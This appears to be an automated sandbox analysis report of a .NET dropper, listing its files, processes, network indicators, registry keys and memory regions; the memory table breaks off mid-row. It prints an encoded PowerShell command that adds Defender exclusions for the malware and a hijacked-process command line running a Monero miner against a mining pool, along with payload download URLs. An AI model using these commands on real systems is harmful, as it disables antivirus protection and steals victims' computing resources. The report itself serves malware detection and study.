Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
cybXkFC5nF.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Roaming\Exception\TypeId.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TypeId.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cybXkFC5nF.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3t1o2d0.dog.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ud4foain.50z.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yt0h1lbg.sfv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zq40omcq.fgk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Exception\TypeId.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\cybXkFC5nF.exe
|
"C:\Users\user\Desktop\cybXkFC5nF.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARQB4AGMAZQBwAHQAaQBvAG4AXABUAHkAcABlAEkAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEUAeABjAGUAcAB0AGkAbwBuAFwAVAB5AHAAZQBJAGQALgBlAHgAZQA=
|
||
C:\Users\user\AppData\Roaming\Exception\TypeId.exe
|
C:\Users\user\AppData\Roaming\Exception\TypeId.exe
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 8Bk24tjeWqN6AqpNY25oCTh7a7WhLbFN3TUCo5DUiJn5bfLEr7diNi64q87hchj2t31ikW7jg7YjGNWQkhH9pf9uH7jTPTb.RIG_CPU
-p x --algo rx/0 --cpu-max-threads-hint=50
|
||
C:\Users\user\AppData\Roaming\Exception\TypeId.exe
|
C:\Users\user\AppData\Roaming\Exception\TypeId.exe
|
||
C:\Users\user\AppData\Roaming\Exception\TypeId.exe
|
C:\Users\user\AppData\Roaming\Exception\TypeId.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://stackoverflow.com/q/14436606/23354
|
unknown
|
||
https://github.com/mgravell/protobuf-netJ
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://xmrig.com/wizard%s
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://crl.mic
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://github.com/mgravell/protobuf-net
|
unknown
|
||
https://xmrig.com/wizard
|
unknown
|
||
https://files.catbox.moe/kwfxr7.dll
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://filebin.net/Afamwaujr/Gupllwtbdl.Lsw
|
88.99.137.18
|
||
https://github.com/mgravell/protobuf-neti
|
unknown
|
||
https://stackoverflow.com/q/11564914/23354;
|
unknown
|
||
https://stackoverflow.com/q/2152978/23354
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://xmrig.com/docs/algorithms
|
unknown
|
||
https://files.catbox.moe/k541xr.dllJ
|
unknown
|
||
https://xmrig.com/benchmark/%s
|
unknown
|
||
http://crl.micft.cMicRosof
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://files.catbox.moe/k541xr.dll
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://schemas.microsoft
|
unknown
|
There are 19 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
s3.filebin.net
|
unknown
|
||
xmr.2miners.com
|
162.19.139.184
|
||
filebin.net
|
88.99.137.18
|
||
puredns.o7lab.me
|
91.92.255.15
|
||
pong.filebin.net
|
88.99.137.18
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
162.19.139.184
|
xmr.2miners.com
|
United States
|
||
88.99.137.18
|
filebin.net
|
Germany
|
||
91.92.255.15
|
puredns.o7lab.me
|
Bulgaria
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\966004821d4bb3e582500fa9d001395d
|
e3309120fcec973ef8c79abef214d968
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\966004821d4bb3e582500fa9d001395d
|
F5FABE5F462CE379E2FAE5276F604EB4
|
There are 6 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
176F10CE000
|
heap
|
page read and write
|
||
176902AA000
|
trusted library allocation
|
page read and write
|
||
17680001000
|
trusted library allocation
|
page read and write
|
||
2AE04DF7000
|
heap
|
page read and write
|
||
2B30FE91000
|
trusted library allocation
|
page read and write
|
||
2B3204AE000
|
trusted library allocation
|
page read and write
|
||
176F2B80000
|
trusted library section
|
page read and write
|
||
176F2C80000
|
trusted library section
|
page read and write
|
||
1A867E49000
|
trusted library allocation
|
page read and write
|
||
2AE04E2B000
|
heap
|
page read and write
|
||
20B0EEEA000
|
trusted library allocation
|
page read and write
|
||
1A878466000
|
trusted library allocation
|
page read and write
|
||
1FAE1AF1000
|
trusted library allocation
|
page read and write
|
||
2B3204D6000
|
trusted library allocation
|
page read and write
|
||
2B3205C6000
|
trusted library allocation
|
page read and write
|
||
17690482000
|
trusted library allocation
|
page read and write
|
||
17690736000
|
trusted library allocation
|
page read and write
|
||
1A878376000
|
trusted library allocation
|
page read and write
|
||
2B320526000
|
trusted library allocation
|
page read and write
|
||
1A8783C6000
|
trusted library allocation
|
page read and write
|
||
140465000
|
remote allocation
|
page execute and read and write
|
||
1A867E66000
|
trusted library allocation
|
page read and write
|
||
20B0EE21000
|
trusted library allocation
|
page read and write
|
||
1A867E23000
|
trusted library allocation
|
page read and write
|
||
140000000
|
remote allocation
|
page execute and read and write
|
||
1FAF2A3A000
|
trusted library allocation
|
page read and write
|
||
176F397D000
|
heap
|
page read and write
|
||
1A867DA8000
|
trusted library allocation
|
page read and write
|
||
140799000
|
remote allocation
|
page execute and read and write
|
||
1FAF2583000
|
trusted library allocation
|
page read and write
|
||
1A87834E000
|
trusted library allocation
|
page read and write
|
||
2AE04DEC000
|
heap
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
1FADFE40000
|
heap
|
page read and write
|
||
245685E8000
|
heap
|
page read and write
|
||
176802E0000
|
trusted library allocation
|
page read and write
|
||
2AE04D30000
|
heap
|
page read and write
|
||
38FEDFD000
|
stack
|
page read and write
|
||
1A8781B2000
|
trusted library allocation
|
page read and write
|
||
2B328A7E000
|
heap
|
page read and write
|
||
1FAE1F6E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B984000
|
trusted library allocation
|
page read and write
|
||
176F3963000
|
heap
|
page read and write
|
||
20B0D200000
|
heap
|
page read and write
|
||
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
2B328C34000
|
heap
|
page read and write
|
||
17680220000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
245102EC000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
7FFD9B99D000
|
trusted library allocation
|
page read and write
|
||
24501E09000
|
trusted library allocation
|
page read and write
|
||
245102F0000
|
trusted library allocation
|
page read and write
|
||
2B30E2BD000
|
heap
|
page read and write
|
||
2B30E2FD000
|
heap
|
page read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
1FAFA3A2000
|
heap
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page execute and read and write
|
||
1FAE1DD5000
|
trusted library allocation
|
page read and write
|
||
1FAE1D8F000
|
trusted library allocation
|
page read and write
|
||
1768040E000
|
trusted library allocation
|
page read and write
|
||
1FAFA6D5000
|
heap
|
page read and write
|
||
24568DF0000
|
heap
|
page execute and read and write
|
||
7FFD9B957000
|
trusted library allocation
|
page read and write
|
||
2B328C07000
|
heap
|
page read and write
|
||
24568DE7000
|
heap
|
page execute and read and write
|
||
1FAE1E53000
|
trusted library allocation
|
page read and write
|
||
7FFD9B984000
|
trusted library allocation
|
page read and write
|
||
176F379D000
|
heap
|
page read and write
|
||
176F0FF6000
|
heap
|
page read and write
|
||
1FAE20C6000
|
trusted library allocation
|
page read and write
|
||
1FADFEAA000
|
heap
|
page read and write
|
||
7FFD9B7AD000
|
trusted library allocation
|
page execute and read and write
|
||
2B328C8A000
|
heap
|
page read and write
|
||
1FAF1B96000
|
trusted library allocation
|
page read and write
|
||
1768012E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
20B0D7A0000
|
heap
|
page read and write
|
||
176F3599000
|
heap
|
page read and write
|
||
D371B3E000
|
stack
|
page read and write
|
||
176F0EF0000
|
heap
|
page read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
20B0D615000
|
heap
|
page read and write
|
||
D37268E000
|
stack
|
page read and write
|
||
24569679000
|
heap
|
page read and write
|
||
5664FFF000
|
stack
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8A4000
|
trusted library allocation
|
page execute and read and write
|
||
24569385000
|
heap
|
page read and write
|
||
1FAE1F1E000
|
trusted library allocation
|
page read and write
|
||
1A8780B2000
|
trusted library allocation
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
1A8661E0000
|
heap
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
1768015C000
|
trusted library allocation
|
page read and write
|
||
24568C10000
|
heap
|
page read and write
|
||
7FFD9B9EA000
|
trusted library allocation
|
page read and write
|
||
2B320152000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
2B310110000
|
trusted library allocation
|
page read and write
|
||
245695DF000
|
heap
|
page read and write
|
||
7FFD9B9F3000
|
trusted library allocation
|
page read and write
|
||
24500C0D000
|
trusted library allocation
|
page read and write
|
||
2B30E2D1000
|
heap
|
page read and write
|
||
17680528000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
2B31009D000
|
trusted library allocation
|
page read and write
|
||
2B328AED000
|
heap
|
page read and write
|
||
1FAF20FD000
|
trusted library allocation
|
page read and write
|
||
1FAE1CC0000
|
trusted library allocation
|
page read and write
|
||
1FAF9B20000
|
trusted library allocation
|
page read and write
|
||
2AE04DC8000
|
heap
|
page read and write
|
||
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAE8000
|
trusted library allocation
|
page read and write
|
||
176F105D000
|
heap
|
page read and write
|
||
7FFD9B78A000
|
trusted library allocation
|
page read and write
|
||
2AE04D10000
|
direct allocation
|
page execute read
|
||
1A87852F000
|
trusted library allocation
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
245685BF000
|
heap
|
page read and write
|
||
1FAF23D7000
|
trusted library allocation
|
page read and write
|
||
2B3288E9000
|
heap
|
page read and write
|
||
24501310000
|
trusted library allocation
|
page read and write
|
||
1FAE217C000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9D6000
|
trusted library allocation
|
page read and write
|
||
1A867D3E000
|
trusted library allocation
|
page read and write
|
||
1FADFE60000
|
heap
|
page read and write
|
||
24500001000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B8000
|
trusted library allocation
|
page read and write
|
||
7FFD9B92D000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
176F376F000
|
heap
|
page read and write
|
||
2B328B23000
|
heap
|
page read and write
|
||
176F3766000
|
heap
|
page read and write
|
||
2B328C6F000
|
heap
|
page read and write
|
||
1FAE0095000
|
heap
|
page read and write
|
||
176802E6000
|
trusted library allocation
|
page read and write
|
||
38833FA000
|
stack
|
page read and write
|
||
17690001000
|
trusted library allocation
|
page read and write
|
||
2B3206D5000
|
trusted library allocation
|
page read and write
|
||
1FAE20F8000
|
trusted library allocation
|
page read and write
|
||
245693B8000
|
heap
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
2B30FFFC000
|
trusted library allocation
|
page read and write
|
||
7FFD9B94C000
|
trusted library allocation
|
page read and write
|
||
1A800030000
|
trusted library allocation
|
page read and write
|
||
176F352E000
|
heap
|
page read and write
|
||
176F34BB000
|
heap
|
page read and write
|
||
20B0D2C6000
|
heap
|
page read and write
|
||
2B30E6EB000
|
heap
|
page read and write
|
||
2B328CB4000
|
heap
|
page read and write
|
||
1FAE21C2000
|
trusted library allocation
|
page read and write
|
||
24501830000
|
trusted library allocation
|
page read and write
|
||
1FAE1E1B000
|
trusted library allocation
|
page read and write
|
||
1FAE1E4C000
|
trusted library allocation
|
page read and write
|
||
1FAE1DC7000
|
trusted library allocation
|
page read and write
|
||
24500EFE000
|
trusted library allocation
|
page read and write
|
||
2B328C4C000
|
heap
|
page read and write
|
||
24568C30000
|
trusted library section
|
page read and write
|
||
1FAF21FB000
|
trusted library allocation
|
page read and write
|
||
2B310435000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
1A86625A000
|
heap
|
page read and write
|
||
1A8782B0000
|
trusted library allocation
|
page read and write
|
||
1A8662F3000
|
heap
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
1FAE1E91000
|
trusted library allocation
|
page read and write
|
||
7FFD9B996000
|
trusted library allocation
|
page read and write
|
||
D371877000
|
stack
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9BF000
|
trusted library allocation
|
page read and write
|
||
1A8784B7000
|
trusted library allocation
|
page read and write
|
||
2B328BCE000
|
heap
|
page read and write
|
||
176F394D000
|
heap
|
page read and write
|
||
1FAE00E0000
|
trusted library allocation
|
page read and write
|
||
2B328B5C000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
38FE9FF000
|
stack
|
page read and write
|
||
176F38C8000
|
heap
|
page read and write
|
||
176F0DC2000
|
unkown
|
page readonly
|
||
7FFD9B934000
|
trusted library allocation
|
page read and write
|
||
1A877D31000
|
trusted library allocation
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
17680452000
|
trusted library allocation
|
page read and write
|
||
1A867EA3000
|
trusted library allocation
|
page read and write
|
||
1A87FD39000
|
heap
|
page read and write
|
||
176F3946000
|
heap
|
page read and write
|
||
1FAE2208000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB73000
|
trusted library allocation
|
page read and write
|
||
24568CB0000
|
trusted library allocation
|
page read and write
|
||
1FAFA380000
|
heap
|
page execute and read and write
|
||
2B3287E1000
|
heap
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
38807FA000
|
stack
|
page read and write
|
||
176801D4000
|
trusted library allocation
|
page read and write
|
||
2B310103000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
20B0D260000
|
heap
|
page read and write
|
||
2B328AA7000
|
heap
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
DE0EB7C000
|
stack
|
page read and write
|
||
176F369B000
|
heap
|
page read and write
|
||
1FAE1DF0000
|
trusted library allocation
|
page read and write
|
||
1FAE2152000
|
trusted library allocation
|
page read and write
|
||
20B0D220000
|
heap
|
page read and write
|
||
DE0F1FD000
|
stack
|
page read and write
|
||
1FAFA3AE000
|
heap
|
page read and write
|
||
5665BFE000
|
stack
|
page read and write
|
||
1FAE1F17000
|
trusted library allocation
|
page read and write
|
||
1FAE1DEB000
|
trusted library allocation
|
page read and write
|
||
176F1030000
|
heap
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
2AE0AE55000
|
heap
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
1FAE00E3000
|
trusted library allocation
|
page read and write
|
||
2B328861000
|
heap
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
24501DE3000
|
trusted library allocation
|
page read and write
|
||
2B328A25000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
24568626000
|
heap
|
page read and write
|
||
176F3580000
|
heap
|
page read and write
|
||
4EC7BFE000
|
stack
|
page read and write
|
||
176801C7000
|
trusted library allocation
|
page read and write
|
||
1FAE1F45000
|
trusted library allocation
|
page read and write
|
||
2B328828000
|
heap
|
page read and write
|
||
2450121B000
|
trusted library allocation
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
2B328C0B000
|
heap
|
page read and write
|
||
17680615000
|
trusted library allocation
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
2B328B49000
|
heap
|
page read and write
|
||
1FAE1AC0000
|
heap
|
page execute and read and write
|
||
176801F6000
|
trusted library allocation
|
page read and write
|
||
1FAE1E37000
|
trusted library allocation
|
page read and write
|
||
176F1260000
|
heap
|
page execute and read and write
|
||
1FAF1F02000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
D37270D000
|
stack
|
page read and write
|
||
7FFD9B998000
|
trusted library allocation
|
page read and write
|
||
176F38FD000
|
heap
|
page read and write
|
||
7FFD9B9C4000
|
trusted library allocation
|
page read and write
|
||
2AE06670000
|
direct allocation
|
page execute and read and write
|
||
245692E0000
|
heap
|
page read and write
|
||
7FFD9B7CC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B93D000
|
trusted library allocation
|
page read and write
|
||
2B30E670000
|
heap
|
page execute and read and write
|
||
3882FFA000
|
stack
|
page read and write
|
||
176F3454000
|
heap
|
page read and write
|
||
7FFD9B9AD000
|
trusted library allocation
|
page read and write
|
||
176F38B1000
|
heap
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
2B3289E2000
|
heap
|
page read and write
|
||
24501E2E000
|
trusted library allocation
|
page read and write
|
||
2AE06750000
|
heap
|
page read and write
|
||
2B320132000
|
trusted library allocation
|
page read and write
|
||
2AE07C55000
|
heap
|
page read and write
|
||
7FFD9B968000
|
trusted library allocation
|
page read and write
|
||
2AE06660000
|
direct allocation
|
page execute and read and write
|
||
176F35DD000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
2AE06855000
|
heap
|
page read and write
|
||
1FAE1E7D000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A6000
|
trusted library allocation
|
page read and write
|
||
1768029D000
|
trusted library allocation
|
page read and write
|
||
176F1155000
|
heap
|
page read and write
|
||
1FAF20A9000
|
trusted library allocation
|
page read and write
|
||
DE0F4FE000
|
stack
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
2B328AF6000
|
heap
|
page read and write
|
||
2B3287BB000
|
heap
|
page read and write
|
||
24568550000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
1768051C000
|
trusted library allocation
|
page read and write
|
||
D3714FE000
|
stack
|
page read and write
|
||
176F109D000
|
heap
|
page read and write
|
||
2B328AC5000
|
heap
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B94E000
|
trusted library allocation
|
page read and write
|
||
2B30E6E0000
|
heap
|
page read and write
|
||
1FAE1D5F000
|
trusted library allocation
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
1FAE1FA1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8AB000
|
trusted library allocation
|
page execute and read and write
|
||
176F3584000
|
heap
|
page read and write
|
||
24510021000
|
trusted library allocation
|
page read and write
|
||
1FAE1DB9000
|
trusted library allocation
|
page read and write
|
||
1FAE2048000
|
trusted library allocation
|
page read and write
|
||
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
24568CF0000
|
trusted library allocation
|
page read and write
|
||
176F37C4000
|
heap
|
page read and write
|
||
176F1033000
|
heap
|
page read and write
|
||
1FAE2160000
|
trusted library allocation
|
page read and write
|
||
17680107000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAEC000
|
trusted library allocation
|
page read and write
|
||
2B328780000
|
heap
|
page read and write
|
||
176803EE000
|
trusted library allocation
|
page read and write
|
||
245012AE000
|
trusted library allocation
|
page read and write
|
||
2B31038C000
|
trusted library allocation
|
page read and write
|
||
38FFA3E000
|
stack
|
page read and write
|
||
1FADFE30000
|
heap
|
page read and write
|
||
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
1A878575000
|
trusted library allocation
|
page read and write
|
||
1FAE1E61000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
176F2DA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9AB000
|
trusted library allocation
|
page read and write
|
||
2AE04E90000
|
heap
|
page read and write
|
||
1FAE1D49000
|
trusted library allocation
|
page read and write
|
||
A7E99FF000
|
stack
|
page read and write
|
||
7FFD9B8AB000
|
trusted library allocation
|
page execute and read and write
|
||
24568730000
|
heap
|
page read and write
|
||
2B310034000
|
trusted library allocation
|
page read and write
|
||
1FAE2284000
|
trusted library allocation
|
page read and write
|
||
1FAE21D8000
|
trusted library allocation
|
page read and write
|
||
24568870000
|
heap
|
page read and write
|
||
17680270000
|
trusted library allocation
|
page read and write
|
||
2B328C44000
|
heap
|
page read and write
|
||
7FFD9B77A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
7FFD9B792000
|
trusted library allocation
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
2B328CA9000
|
heap
|
page read and write
|
||
2B328944000
|
heap
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B772000
|
trusted library allocation
|
page read and write
|
||
1FAE1FD9000
|
trusted library allocation
|
page read and write
|
||
2B3104AD000
|
trusted library allocation
|
page read and write
|
||
24569479000
|
heap
|
page read and write
|
||
176802BE000
|
trusted library allocation
|
page read and write
|
||
1FAF1F56000
|
trusted library allocation
|
page read and write
|
||
1FAE1E68000
|
trusted library allocation
|
page read and write
|
||
2B31037E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
2B328B1E000
|
heap
|
page read and write
|
||
1FAFA688000
|
heap
|
page read and write
|
||
2B3103D7000
|
trusted library allocation
|
page read and write
|
||
245696D4000
|
heap
|
page read and write
|
||
7FFD9B937000
|
trusted library allocation
|
page read and write
|
||
2B328C81000
|
heap
|
page read and write
|
||
176F38F8000
|
heap
|
page read and write
|
||
24501099000
|
trusted library allocation
|
page read and write
|
||
1FADFE9C000
|
heap
|
page read and write
|
||
1FAFA680000
|
heap
|
page read and write
|
||
176F3882000
|
heap
|
page read and write
|
||
176F3481000
|
heap
|
page read and write
|
||
1A866248000
|
heap
|
page read and write
|
||
176F37CE000
|
heap
|
page read and write
|
||
2B3100E2000
|
trusted library allocation
|
page read and write
|
||
176F1285000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
7DF426DA0000
|
trusted library allocation
|
page execute and read and write
|
||
1FAF1CA3000
|
trusted library allocation
|
page read and write
|
||
176F343A000
|
heap
|
page read and write
|
||
7FFD9BAB2000
|
trusted library allocation
|
page read and write
|
||
176F10F0000
|
heap
|
page read and write
|
||
1A8782FF000
|
trusted library allocation
|
page read and write
|
||
1FAF24D8000
|
trusted library allocation
|
page read and write
|
||
1FAE01E0000
|
heap
|
page read and write
|
||
176F1170000
|
trusted library allocation
|
page read and write
|
||
17680534000
|
trusted library allocation
|
page read and write
|
||
2B32079B000
|
trusted library allocation
|
page read and write
|
||
20B0D240000
|
heap
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
17680263000
|
